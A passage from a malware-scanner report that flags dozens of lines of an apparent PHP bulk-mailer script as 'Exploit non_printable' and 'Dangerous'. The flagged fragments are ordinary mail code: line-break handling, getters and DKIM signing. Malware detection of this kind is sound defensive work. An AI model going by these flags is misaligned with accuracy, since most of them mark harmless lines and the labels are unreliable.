</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
